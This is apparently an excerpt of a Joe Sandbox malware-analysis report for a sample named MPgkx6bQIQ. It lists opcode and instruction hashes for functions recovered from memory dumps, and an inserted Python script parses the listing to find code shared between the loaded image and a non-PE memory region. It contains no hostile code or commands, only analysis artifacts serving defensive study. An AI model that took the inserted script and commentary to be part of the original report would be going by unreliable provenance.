• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 80662d8b24bff6f8992e634c1a49b92d2c70a6d1023e3f7c4dc80169a6ede74d
                                                                                                                                                                                                                                                                                          • Instruction ID: f3345cb18c34d22cea7c76b8972ea9c026089d6dd7aab1ac627898e589a0e88a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80662d8b24bff6f8992e634c1a49b92d2c70a6d1023e3f7c4dc80169a6ede74d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E416676A687148FC328DF64DCC427BB2A2EBDA310F1E952D8AE61B354DB644D018689
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: a2cbd620310961616688d7e42db6707dedebd0210a3dd93db7e64ebc8315cc7a
                                                                                                                                                                                                                                                                                          • Instruction ID: 18739143fc2bfdd9b27d4ece1bca2e3bc02b1a705655674dfedca087045c6feb
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a2cbd620310961616688d7e42db6707dedebd0210a3dd93db7e64ebc8315cc7a
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1841A1A01083D18AD7368F2980607BBBBE1EFA325DF1849AEC2D5A7683D7754007C759
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: a2cbd620310961616688d7e42db6707dedebd0210a3dd93db7e64ebc8315cc7a
                                                                                                                                                                                                                                                                                          • Instruction ID: 6458c2a36ad1cb1d3c56fad7511fb74c051b1bd8ee895f970e959f4703a01e69
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a2cbd620310961616688d7e42db6707dedebd0210a3dd93db7e64ebc8315cc7a
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 404117A02083D18BD7358F3990607B7BFD19FA3219F5948ADC6C597283D7784007C71A
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 464c79d7ef81001f4e361af6555152b884662c27da4a39cdc900ccd1ec23a395
                                                                                                                                                                                                                                                                                          • Instruction ID: 1886ef0e2a34783752b0448fe39cebd73ef78dac866104b07dd169c35a0afa04
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 464c79d7ef81001f4e361af6555152b884662c27da4a39cdc900ccd1ec23a395
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E551577951C3408BD328DF24D880A6BB7F2EFC6304F18995CF986AB3A5DB309906C756
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: afec766a8f46cebfa70309c7c12ba714155290e18f5d997497038f4e7e1a0749
                                                                                                                                                                                                                                                                                          • Instruction ID: a53d6d527b8eca4361064ca06ae8b9aadd675c236848c3e24e7c3388c99ba615
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: afec766a8f46cebfa70309c7c12ba714155290e18f5d997497038f4e7e1a0749
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD4145B1A002418BDB258F39CC917737BE2EF92318F28856ED492CBBA5E7399441CB10
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 0aff5b575bdc1cbf128a6fcaf21673d610ba054c2e19d9dceb1adbeeb882f19a
                                                                                                                                                                                                                                                                                          • Instruction ID: b41d1344dea177b86e3632ad74414e96ff8f6566370b896284136c93e0be55b6
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0aff5b575bdc1cbf128a6fcaf21673d610ba054c2e19d9dceb1adbeeb882f19a
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8418A752183808FD7299B24CCD67BB77E0EF96704F18946EE4C2CB292E7254903CB1A
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
                                                                                                                                                                                                                                                                                          • Instruction ID: 47f10220abf95029be2718c47a7771dfc95221f9e3f2688b976712ae3ca565f8
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 414180A010C3D18AD7268B3490607BBBBD0EBA325DF14599DC2D6A7683D7354007CB5A
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 8b560107b2d6cb4b4134e509f7d426598bac8a750c2db8c16c52e4f48a3db998
                                                                                                                                                                                                                                                                                          • Instruction ID: d85d8e7ba49753ff7f36d3ed97c285ab1e5e24199585a0ad528ba1d19501f263
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b560107b2d6cb4b4134e509f7d426598bac8a750c2db8c16c52e4f48a3db998
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7313B602083A15BD3B58B2864B077F7BD2DF87304F68496DD0C9872A2D7289485C74E
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
                                                                                                                                                                                                                                                                                          • Instruction ID: eb231649460b60e8b645cff36354959ad8fc4f47b4bc3ecb8744b755d441be80
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC3191A02083E18BDB358F2491207FBBBE0AB93259F54499DC7D9A7683D7384017CB5E
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 546c49f651c2ee0ec7203154adbd460b810419c4e5ed9a3c8b647bf01d903c3f
                                                                                                                                                                                                                                                                                          • Instruction ID: 7ca21e3234f8b6694d054e6d93b430c09175b952ea1641c4298216a1dcbd43af
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 546c49f651c2ee0ec7203154adbd460b810419c4e5ed9a3c8b647bf01d903c3f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 183144726183448FC724CF648CA06BBB762EFA6748F1D853EDA8683741D775C9018B46
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 9879a937105e083bd9aef7d9b8e876d5a873d896f238b78d14b88aad6da131cd
                                                                                                                                                                                                                                                                                          • Instruction ID: 6a2af28f1fb56cc36e3fa169f1384b26f7e51cefd07ca25af218a68f0aaab131
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9879a937105e083bd9aef7d9b8e876d5a873d896f238b78d14b88aad6da131cd
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8631C834A2A501DAE765BB25CC4073A7767FBC6305F78952ED0C1936E8DB349C52CB14
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                          • Opcode ID: c0dbcf0a297be600f964884bc0c72e3d7d006dba3a211061d9d622b887688d22
                                                                                                                                                                                                                                                                                          • Instruction ID: 608a5c001c9016f47e6d849a3a7bf8eb37f8ca910ed307557679ae7e480cd3ab
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0dbcf0a297be600f964884bc0c72e3d7d006dba3a211061d9d622b887688d22
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F31F139E146009AE325AB598C807377753FBC7300F68D13EE092A32E9DA38AC16874D
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
                                                                                                                                                                                                                                                                                          • Instruction ID: 37ba2d6212f0e4bfb1f23e9c6c8f6fdf5c328a5282f30d0e6be11af4c26e01b2
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9213B2170879107D719DE3988D127BF7E39FC7119F18C63FC8A2876D5CA30D9068604
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
• Instruction ID: 4f1d9a8e55b01d87ed81b452fa3618ff49b1b83c19e4b1c484c24ed6b64955da
• Opcode Fuzzy Hash: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
• Instruction Fuzzy Hash: 78212921718B550BD728DE3988D132BF7D39BCB210F48D63EC5938B2D6CA34D9054688

Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fbddf629d58ab5b7ce3c6d341b6087eefabcc06d9ed1031e48f954126914271b
• Instruction ID: 53a8eecb4edcad1944e89d80f86ae646f279df54e3ef8f40f633b39275c45079
• Opcode Fuzzy Hash: fbddf629d58ab5b7ce3c6d341b6087eefabcc06d9ed1031e48f954126914271b
• Instruction Fuzzy Hash: 8721F634614B019FD761CF28D880F27BBA3EBC6724F258668D595477A5DB30EC42CB54

Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 201c4f8f0819f68cd48f73e785265dbdbac7085615a68ae6b401f2b6715c5eb6
• Instruction ID: c284272cbe1354c2bac86839248cf07ee5637eab11ef42c9faf85a1953e6744e
• Opcode Fuzzy Hash: 201c4f8f0819f68cd48f73e785265dbdbac7085615a68ae6b401f2b6715c5eb6
• Instruction Fuzzy Hash: B521217AA08225CFCB04DF24E88466AF3A0FF4A714F5A947ED5858B241D3309E90CF86

Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d6c3b5f98540c4edbfb2bfe1cd8306b70007439d23ccf1357e9be793c2fe8105
• Instruction ID: b96faad36df9bec707c24d3aa48d4674efc2e3ec6492beaf23e87ea6b6714af9
• Opcode Fuzzy Hash: d6c3b5f98540c4edbfb2bfe1cd8306b70007439d23ccf1357e9be793c2fe8105
• Instruction Fuzzy Hash: CD112733F265A147A350FE379CD862B6383E7C5214B1A0135EE42C7381CB72F902E294

Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d6c3b5f98540c4edbfb2bfe1cd8306b70007439d23ccf1357e9be793c2fe8105
• Instruction ID: d3efd499d3fbc33036e2032367fc91d0155dae543bbe3474a39f1f7b468c3dc9
• Opcode Fuzzy Hash: d6c3b5f98540c4edbfb2bfe1cd8306b70007439d23ccf1357e9be793c2fe8105
• Instruction Fuzzy Hash: 4A11B273F2A92107F3549E369C9C21B6352E7C531471A0535D941A72C1CA79F902E168

Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c3217eddf26d73e13bed4335cf48e091058d425e1d7b0796f7844dc1e666736a
• Instruction ID: 2ae32c99da0c37c3c817af64148525931b4e9dc37609f5ee8fae64d7a3d152b9
• Opcode Fuzzy Hash: c3217eddf26d73e13bed4335cf48e091058d425e1d7b0796f7844dc1e666736a
• Instruction Fuzzy Hash: EE110131A443409BCB18CF64D9E1A7FB3B1ABAA305F88543EA5D2C3391C374C8018B46

Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 44c97935eddf75c305e2d2b65cd8ba00c8eb118628fa0640b3156059a25bc93e
• Instruction ID: a3bebf31a3e1a0755c57bac4ae011399ec0b3d644d63da755b126511517c75fa
• Opcode Fuzzy Hash: 44c97935eddf75c305e2d2b65cd8ba00c8eb118628fa0640b3156059a25bc93e
• Instruction Fuzzy Hash: 1C118C75A587044FC319EFA4ECC027BB3A0FF96314F19853C89E607750D7608D108609

Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 44c97935eddf75c305e2d2b65cd8ba00c8eb118628fa0640b3156059a25bc93e
• Instruction ID: 20ca1e341728769f683a14c7d19e02f3155232ce684509dc4d83bd4e8ff0b8df
• Opcode Fuzzy Hash: 44c97935eddf75c305e2d2b65cd8ba00c8eb118628fa0640b3156059a25bc93e
• Instruction Fuzzy Hash: 72112575A587048FC318EFA4ACC837BB3A4EB8A311F29953D86A647350DB608D118689
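The records above are the flattened per-function table written by the Joe Sandbox IDA plugin: one record per Memory Dump Source, each carrying the Opcode ID (identical to the Opcode Fuzzy Hash in every record on this page) and a per-dump Instruction ID. The same Opcode ID showing up in the 00400000 image and in the 02480000 region the report marks "based on PE: false" (for instance d6c3b5f9... and 44c97935...) is the overlap a reverse engineer checks first, since it ties code in a non-image-backed region back to a function in the loaded executable. As an added example that is not part of the Joe Sandbox report, the Python below parses this layout, applies the sanity checks a reviewer would want on each record, and lists Opcode IDs recovered from more than one dump. The SAMPLE string is transcribed from three of the records on this page (the empty label rows are dropped from the second and third); the function names and the check rules are this example's own choices.

```python
"""Parse the flattened Joe Sandbox IDA-plugin function listing and find
functions (by Opcode ID) recovered from more than one memory dump.
Added example, not part of the report. SAMPLE is transcribed from three of
the report's records for MPgkx6bQIQ.exe; everything else is this script's."""
import re
from collections import defaultdict

SAMPLE = """\
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d6c3b5f98540c4edbfb2bfe1cd8306b70007439d23ccf1357e9be793c2fe8105
• Instruction ID: b96faad36df9bec707c24d3aa48d4674efc2e3ec6492beaf23e87ea6b6714af9
• Opcode Fuzzy Hash: d6c3b5f98540c4edbfb2bfe1cd8306b70007439d23ccf1357e9be793c2fe8105
• Instruction Fuzzy Hash: CD112733F265A147A350FE379CD862B6383E7C5214B1A0135EE42C7381CB72F902E294
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
• Opcode ID: d6c3b5f98540c4edbfb2bfe1cd8306b70007439d23ccf1357e9be793c2fe8105
• Instruction ID: d3efd499d3fbc33036e2032367fc91d0155dae543bbe3474a39f1f7b468c3dc9
• Opcode Fuzzy Hash: d6c3b5f98540c4edbfb2bfe1cd8306b70007439d23ccf1357e9be793c2fe8105
• Instruction Fuzzy Hash: 4A11B273F2A92107F3549E369C9C21B6352E7C531471A0535D941A72C1CA79F902E168
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
• Opcode ID: c3217eddf26d73e13bed4335cf48e091058d425e1d7b0796f7844dc1e666736a
• Instruction ID: 2ae32c99da0c37c3c817af64148525931b4e9dc37609f5ee8fae64d7a3d152b9
• Opcode Fuzzy Hash: c3217eddf26d73e13bed4335cf48e091058d425e1d7b0796f7844dc1e666736a
• Instruction Fuzzy Hash: EE110131A443409BCB18CF64D9E1A7FB3B1ABAA305F88543EA5D2C3391C374C8018B46
"""

FIELD = re.compile(r"^•\s*([^:]+):\s*(.*)$")  # "• Key: value" rows

def parse_records(text):
    """Split the listing into one dict per 'Memory Dump Source' record.
    Bare labels (Yara matches, Similarity) carry no value and are skipped;
    the comma-separated tail of 'Source File' becomes keys of its own."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            current = {}
            records.append(current)
        elif current is not None and (m := FIELD.match(line)):
            key, value = m.group(1).strip(), m.group(2).strip()
            if key == "Source File":
                path, *tail = [p.strip() for p in value.split(",")]
                current[key] = path
                for item in tail:  # "Offset: 02480000", "based on PE: false"
                    k, _, v = item.partition(":")
                    current[k.strip()] = v.strip()
            else:
                current[key] = value
    return records

def validate(record):
    """Sanity checks on one record; returns the list of problems found."""
    problems = []
    for key in ("Offset", "Opcode ID", "Instruction ID", "Instruction Fuzzy Hash"):
        if not record.get(key):
            problems.append(f"missing {key}")
    oid = record.get("Opcode ID")
    if oid and oid != record.get("Opcode Fuzzy Hash"):
        problems.append("Opcode ID and Opcode Fuzzy Hash disagree")
    if oid and not re.fullmatch(r"[0-9a-f]{64}", oid):
        problems.append("Opcode ID is not a 64-hex-digit value")
    return problems

def shared_functions(records):
    """Opcode ID -> sorted dump offsets, restricted to IDs seen in more than
    one dump (the same opcode sequence in the image and in a non-PE region)."""
    seen = defaultdict(set)
    for r in records:
        if r.get("Opcode ID") and r.get("Offset"):
            seen[r["Opcode ID"]].add(r["Offset"])
    return {oid: sorted(offs) for oid, offs in seen.items() if len(offs) > 1}

def non_pe_backed_offsets(records):
    """Offsets of dumps the report marks 'based on PE: false'."""
    return sorted({r["Offset"] for r in records if r.get("based on PE") == "false"})

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for oid, offs in shared_functions(recs).items():
        print(f"{oid[:16]}... present in dumps {', '.join(offs)}")
    print("not PE-backed:", non_pe_backed_offsets(recs))
```

The Instruction ID is deliberately left out of the overlap key: it differs between the two copies of d6c3b5f9... on this page while the Opcode ID is identical, which is what you expect when the same function is relocated, so matching on Opcode ID is what finds the duplicate. Feed the whole exported listing in place of SAMPLE to run the same check across every record.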
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: f5c82fc671e06e79b78df2e2b48bef573e4aa83533a2b75342557a0be53bb444
                                                                                                                                                                                                                                                                                          • Instruction ID: 8c2434230611f9a81e383c74aa922dad9da981a7ab8050aaa794470a2180fdfd
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f5c82fc671e06e79b78df2e2b48bef573e4aa83533a2b75342557a0be53bb444
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A0126347042805AFB588B28CC51B3BB753EBD6700F65912EE1819B2D1EE708C428B06
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
